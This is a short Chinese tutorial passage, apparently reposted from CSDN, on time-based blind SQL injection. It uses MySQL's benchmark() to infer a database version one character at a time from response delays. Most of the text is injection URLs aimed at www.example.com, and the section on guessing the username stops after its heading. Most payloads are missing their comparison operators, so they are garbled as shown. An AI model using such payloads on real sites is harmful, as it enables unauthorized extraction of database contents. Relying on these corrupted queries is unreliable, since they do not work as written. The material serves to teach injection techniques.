Benchmark盲注流程
猜解数据库版本名称
猜测数据库版本名称的第一个值:————5。
http://www.example.com/?id=1\’ and if(left(version(),1)4,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟
http://www.example.com/?id=1\’ and if(left(version(),1)5,1,(select benchmark(10000000,md5(0x41)))) –+ #有延迟
http://www.example.com/?id=1\’ and if(left(version(),1)=5,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟
猜测数据库版本名称的第二个值————5.5
http://www.example.com/?id=1\’ and if(left(version(),3)5.4,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟
http://www.example.com/?id=1\’ and if(left(version(),3)5.5,1,(select benchmark(10000000,md5(0x41)))) –+ #有延迟
http://www.example.com/?id=1\’ and if(left(version(),3)=5.5,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟
因此,原来数据库的版本信息是5.5。
猜解数据库用户名称
首先猜测用户名的长度
#【漏洞挖掘】——104及以上相关内容来源网络对盲注入类型的详细分析,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91399.html
